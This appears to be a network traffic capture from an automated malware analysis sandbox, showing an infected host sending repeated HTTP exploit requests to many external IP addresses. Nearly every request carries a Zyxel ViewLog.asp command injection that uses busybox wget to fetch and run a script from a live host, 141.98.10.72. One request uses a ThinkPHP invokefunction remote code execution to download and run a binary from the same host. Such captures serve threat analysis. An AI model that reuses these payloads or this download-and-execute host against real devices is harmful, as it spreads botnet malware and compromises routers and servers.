                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.326210976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      775192.168.2.153836094.178.243.748080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.327291012 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:37.586213112 CET21INHTTP/1.1
                                                      Data Raw:
                                                      Data Ascii:


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      776192.168.2.1537194112.165.98.5980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.753827095 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:38.034147978 CET504INHTTP/1.0 400 Bad Request
                                                      Content-Type: text/html
                                                      Content-Length: 349
                                                      Connection: close
                                                      Date: Wed, 14 Feb 2024 08:30:38 GMT
                                                      Server: lighttpd/1.4.37
                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      777192.168.2.153823862.225.47.2058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.780132055 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:37.989213943 CET937INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 741
                                                      Date: Wed, 14 Feb 2024 08:30:37 GMT
                                                      Keep-Alive: timeout=20
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 35 34 20 28 44 65 62 69 61 6e 29 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.54 (Debian)</h3></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      778192.168.2.153343494.122.193.1548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.823518991 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      779192.168.2.153893694.123.138.418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.823964119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      780192.168.2.155460094.121.98.818080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.827693939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      781192.168.2.155241494.120.48.558080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.829168081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      782192.168.2.154813285.255.168.2278080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:37.829503059 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:38.077711105 CET381INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 10:04:38 GMT
                                                      Server: web
                                                      Cache-Control: no-cache
                                                      Content-Length: 166
                                                      Content-Type: text/html
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=60, max=99
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      783192.168.2.154125231.136.5.688080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:38.523827076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:39.192192078 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:40.536115885 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:43.352257967 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:48.727930069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:59.479506016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.263060093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:32:05.269928932 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      784192.168.2.154705895.217.148.1048080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:38.749949932 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      785192.168.2.154207694.121.75.388080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:38.772306919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      786192.168.2.155034095.86.118.1308080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:38.776449919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      787192.168.2.155215095.140.138.2118080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.273483992 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      788192.168.2.153321494.243.239.1058080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.289577007 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      789192.168.2.154302294.187.101.238080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:40.299737930 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


